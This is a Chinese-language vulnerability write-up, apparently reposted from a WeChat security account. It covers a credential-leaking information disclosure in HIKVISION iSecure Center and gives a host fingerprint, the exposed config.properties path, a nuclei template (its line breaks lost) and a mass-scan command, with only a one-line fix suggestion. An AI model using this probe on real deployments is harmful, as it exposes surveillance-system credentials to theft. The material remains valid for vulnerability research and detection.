免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
02
—
漏洞影响
HIKVISION iSecure Center综合安防管理平台,版本不详
03
—
漏洞描述
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。
04
—
app="HIKVISION-综合安防管理平台"
05
—
漏洞复现
poc如下
/portal/conf/config.properties使用浏览器访问
证明存在漏洞
06
—
nuclei poc
poc文件内容如下
id: hikvision-disclosureinfo:name: 海康威视综合安防管理平台信息泄露漏洞author: fgzseverity: highreference:nonedescription: |HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。存在信息泄露漏洞,密码解密后可以登录后台。metadata:: app="HIKVISION-综合安防管理平台"veified: truetags: hikvisionhttp:method: GETpath:"{{BaseURL}}/portal/conf/config.properties": andmatchers:type: statusstatus:200type: wordpart: bodywords:'@bic''username''password'condition: and
运行POC
.nuclei.exe -t .hikvision-disclosure.yaml -l .1.txt -me result
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):【0day】海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论